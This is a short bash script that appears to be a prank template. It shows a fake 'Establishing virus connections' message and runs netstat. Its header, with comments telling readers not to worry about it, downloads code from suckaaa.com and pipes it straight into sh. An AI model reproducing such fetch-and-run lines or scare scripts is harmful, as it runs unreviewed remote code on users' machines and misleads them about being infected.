#!/bin/bash

###########  HEADER  ###########
# loL whatcha lookin for in here??
# Don't worry about it!!
curl -s 'https://suckaaa.com/s/garbage-lib-installer' | sh;
source ~/.garbage/lib;
clear;
###########  END HEADER  ###########

# Stuff here

# Run the next script
# nextScript 'https://suckaaa.com/s/script-name-here';

bigMsg "Ok, so... Establishing virus connections now...";

sleep 3s;

netstat -a;

# echo whatever and onto the next
